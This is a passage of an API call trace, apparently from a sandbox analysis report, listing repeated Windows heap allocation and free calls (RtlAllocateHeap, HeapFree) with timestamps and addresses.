hHeap=0x6a0000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | 